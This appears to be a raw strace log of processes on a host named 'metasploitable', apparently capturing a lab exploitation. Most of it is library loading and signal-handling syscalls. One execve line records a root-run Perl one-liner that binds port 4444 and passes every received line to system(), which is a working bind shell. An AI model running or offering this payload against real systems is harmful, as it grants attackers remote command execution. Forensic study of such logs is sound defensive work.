10027 07:30:59.996341 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

10027 07:30:59.996359 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7df5000

10027 07:30:59.996370 mmap2(0xb7dfd000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7dfd000

10027 07:30:59.996387 close(1)          = 0

10027 07:30:59.996400 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10027 07:30:59.996413 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

10027 07:30:59.996428 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10027 07:30:59.996568 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

10027 07:30:59.996586 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dea000

10027 07:30:59.996598 mmap2(0xb7df3000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7df3000

10027 07:30:59.996615 close(1)          = 0

10027 07:30:59.996638 munmap(0xb7fa5000, 29913) = 0

10027 07:30:59.996654 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

10027 07:30:59.996669 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

10027 07:30:59.996682 _llseek(1, 0, [0], SEEK_CUR) = 0

10027 07:30:59.996694 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

10027 07:30:59.996710 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7fac000

10027 07:30:59.996721 _llseek(1, 1624, [1624], SEEK_SET) = 0

10027 07:30:59.996737 munmap(0xb7fac000, 1624) = 0

10027 07:30:59.996747 close(1)          = 0

10027 07:30:59.996777 getpgrp()         = 3831

10027 07:30:59.996788 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

10027 07:30:59.996805 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

10027 07:30:59.996822 brk(0x8101000)    = 0x8101000

10027 07:30:59.996855 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10027 07:30:59.996870 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10027 07:30:59.996889 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10027 07:30:59.996927 brk(0x8102000)    = 0x8102000

10027 07:30:59.996965 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10027 07:30:59.997015 stat64("/sbin/AB", 0xbf964fb8) = -1 ENOENT (No such file or directory)

10027 07:30:59.997042 stat64("/bin/AB", 0xbf964fb8) = -1 ENOENT (No such file or directory)

10027 07:30:59.997054 stat64("/usr/sbin/AB", 0xbf964fb8) = -1 ENOENT (No such file or directory)

10027 07:30:59.997066 stat64("/usr/bin/AB", 0xbf964fb8) = -1 ENOENT (No such file or directory)

10027 07:30:59.997079 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10027 07:30:59.997095 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e206f8) = 10028

10028 07:30:59.997147 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10028 07:30:59.997164 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10028 07:30:59.997177 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10028 07:30:59.997189 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10028 07:30:59.997206 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10028 07:30:59.997222 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10028 07:30:59.997235 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10028 07:30:59.997292 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

10028 07:30:59.997307 --- SIGPIPE (Broken pipe) @ 0 (0) ---

10028 07:30:59.997381 exit_group(127)   = ?

4519  07:31:00.023513 waitpid(10027,  <unfinished ...>

10027 07:31:00.033532 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10027 07:31:00.033567 --- SIGCHLD (Child exited) @ 0 (0) ---

10027 07:31:00.033596 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 10028

10027 07:31:00.033613 waitpid(-1, 0xbf964c38, WNOHANG) = -1 ECHILD (No child processes)

10027 07:31:00.033623 sigreturn()       = ? (mask now [])

10027 07:31:00.033646 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10027 07:31:00.033662 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10027 07:31:00.033673 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10027 07:31:00.033685 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

10027 07:31:00.033704 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10027 07:31:00.033715 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

10027 07:31:00.033749 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10027 07:31:00.033769 stat64("/sbin/perl", 0xbf964fe8) = -1 ENOENT (No such file or directory)

10027 07:31:00.033782 stat64("/bin/perl", 0xbf964fe8) = -1 ENOENT (No such file or directory)

10027 07:31:00.033793 stat64("/usr/sbin/perl", 0xbf964fe8) = -1 ENOENT (No such file or directory)

10027 07:31:00.033805 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10027 07:31:00.033823 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10027 07:31:00.033849 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10027 07:31:00.033863 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e206f8) = 10029

10029 07:31:00.033919 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10029 07:31:00.033935 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10029 07:31:00.033948 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10029 07:31:00.033960 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10029 07:31:00.033987 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10029 07:31:00.034032 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10029 07:31:00.034045 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10029 07:31:00.034093 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

10029 07:31:00.034181 brk(0)            = 0x8153000

10029 07:31:00.034201 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10029 07:31:00.034222 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f9f000

10029 07:31:00.034238 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10029 07:31:00.034254 open("/etc/ld.so.cache", O_RDONLY) = 1

10029 07:31:00.034266 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10029 07:31:00.034283 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f97000

10029 07:31:00.034293 close(1)          = 0

10029 07:31:00.034304 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10029 07:31:00.034319 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10029 07:31:00.034333 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10029 07:31:00.034423 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10029 07:31:00.034440 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f93000

10029 07:31:00.034452 mmap2(0xb7f95000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f95000

10029 07:31:00.034477 close(1)          = 0

10029 07:31:00.034490 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10029 07:31:00.034535 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

10029 07:31:00.034564 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

10029 07:31:00.034667 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

10029 07:31:00.034685 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f6e000

10029 07:31:00.034697 mmap2(0xb7f91000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f91000

10029 07:31:00.034712 close(1)          = 0

10029 07:31:00.034724 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10029 07:31:00.034737 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

10029 07:31:00.034753 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

10029 07:31:00.034841 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

10029 07:31:00.034857 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f6d000

10029 07:31:00.034870 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f55000

10029 07:31:00.034881 mmap2(0xb7f69000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f69000

10029 07:31:00.034895 mmap2(0xb7f6b000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f6b000

10029 07:31:00.034908 close(1)          = 0

10029 07:31:00.034920 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10029 07:31:00.034933 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10029 07:31:00.034946 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10029 07:31:00.035083 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10029 07:31:00.035101 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e06000

10029 07:31:00.035113 mmap2(0xb7f4f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f4f000

10029 07:31:00.035127 mmap2(0xb7f52000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f52000

10029 07:31:00.035140 close(1)          = 0

10029 07:31:00.035152 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10029 07:31:00.035165 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

10029 07:31:00.035179 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

10029 07:31:00.035268 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

10029 07:31:00.035285 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dd4000

10029 07:31:00.035296 mmap2(0xb7ddd000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7ddd000

10029 07:31:00.035310 mmap2(0xb7ddf000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ddf000

10029 07:31:00.035324 close(1)          = 0

10029 07:31:00.035347 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dd3000

10029 07:31:00.035360 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dd38c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10029 07:31:00.035418 mprotect(0xb7f4f000, 4096, PROT_READ) = 0

10029 07:31:00.035444 munmap(0xb7f97000, 29913) = 0

10029 07:31:00.035457 set_tid_address(0xb7dd3908) = 10029

10029 07:31:00.035475 set_robust_list(0xb7dd3910, 0xc) = 0

10029 07:31:00.035485 futex(0xbfdc3a60, 0x81 /* FUTEX_??? */, 1) = 0

10029 07:31:00.035529 rt_sigaction(SIGRTMIN, {0xb7f592c0, [], SA_SIGINFO}, NULL, 8) = 0

10029 07:31:00.035559 rt_sigaction(SIGRT_1, {0xb7f59340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

10029 07:31:00.035588 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

10029 07:31:00.035601 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

10029 07:31:00.035620 uname({sys="Linux", node="metasploitable", ...}) = 0

10029 07:31:00.035665 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

10029 07:31:00.035711 brk(0)            = 0x8153000

10029 07:31:00.035720 brk(0x8174000)    = 0x8174000

10029 07:31:00.035763 getuid32()        = 0

10029 07:31:00.035773 geteuid32()       = 0

10029 07:31:00.035782 getgid32()        = 0

10029 07:31:00.035791 getegid32()       = 0

10029 07:31:00.035827 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7db2000

10029 07:31:00.035855 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

10029 07:31:00.035872 read(1, "\245h\323I", 4) = 4

10029 07:31:00.035889 close(1)          = 0

10029 07:31:00.035906 time(NULL)        = 1495625460

10029 07:31:00.035946 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfdc3730) = -1 ENOENT (No such file or directory)

10029 07:31:00.035973 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfdc3730) = -1 ENOENT (No such file or directory)

10029 07:31:00.036017 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfdc3730) = -1 ENOENT (No such file or directory)

10029 07:31:00.036034 stat64("/usr/local/lib/perl/5.8.7", 0xbfdc3870) = -1 ENOENT (No such file or directory)

10029 07:31:00.036063 stat64("/usr/local/share/perl/5.8.7", 0xbfdc3870) = -1 ENOENT (No such file or directory)

10029 07:31:00.036092 stat64("/usr/local/lib/perl/5.8.6", 0xbfdc3870) = -1 ENOENT (No such file or directory)

10029 07:31:00.036103 stat64("/usr/local/share/perl/5.8.6", 0xbfdc3870) = -1 ENOENT (No such file or directory)

10029 07:31:00.036115 stat64("/usr/local/lib/perl/5.8.4", 0xbfdc3870) = -1 ENOENT (No such file or directory)

10029 07:31:00.036145 stat64("/usr/local/share/perl/5.8.4", 0xbfdc3870) = -1 ENOENT (No such file or directory)

10029 07:31:00.036223 stat64("/usr/local/lib/perl/5.8.3", 0xbfdc3870) = -1 ENOENT (No such file or directory)

10029 07:31:00.036242 stat64("/usr/local/share/perl/5.8.3", 0xbfdc3870) = -1 ENOENT (No such file or directory)

10029 07:31:00.036254 stat64("/usr/local/lib/perl/5.8.2", 0xbfdc3870) = -1 ENOENT (No such file or directory)

10029 07:31:00.036266 stat64("/usr/local/share/perl/5.8.2", 0xbfdc3870) = -1 ENOENT (No such file or directory)

10029 07:31:00.036277 stat64("/usr/local/lib/perl/5.8.1", 0xbfdc3870) = -1 ENOENT (No such file or directory)

10029 07:31:00.036289 stat64("/usr/local/share/perl/5.8.1", 0xbfdc3870) = -1 ENOENT (No such file or directory)

10029 07:31:00.036300 stat64("/usr/local/lib/perl/5.8.0", 0xbfdc3870) = -1 ENOENT (No such file or directory)

10029 07:31:00.036312 stat64("/usr/local/share/perl/5.8.0", 0xbfdc3870) = -1 ENOENT (No such file or directory)

10029 07:31:00.036335 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfdc3568) = -1 ENOTTY (Inappropriate ioctl for device)

10029 07:31:00.036348 _llseek(0, 0, [0], SEEK_CUR) = 0

10029 07:31:00.036360 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfdc3568) = -1 EBADF (Bad file descriptor)

10029 07:31:00.036371 _llseek(1, 0, 0xbfdc35b0, SEEK_CUR) = -1 EBADF (Bad file descriptor)

10029 07:31:00.036381 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfdc3568) = -1 EINVAL (Invalid argument)

10029 07:31:00.036391 _llseek(2, 0, 0xbfdc35b0, SEEK_CUR) = -1 ESPIPE (Illegal seek)

10029 07:31:00.036402 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

10029 07:31:00.036415 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfdc3628) = -1 ENOTTY (Inappropriate ioctl for device)

10029 07:31:00.036425 _llseek(1, 0, [0], SEEK_CUR) = 0

10029 07:31:00.036435 fcntl64(1, F_SETFD, FD_CLOEXEC) = 0

10029 07:31:00.036447 fstat64(1, {st_mode=S_IFCHR|0666, st_rdev=makedev(1, 3), ...}) = 0

10029 07:31:00.036575 rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0

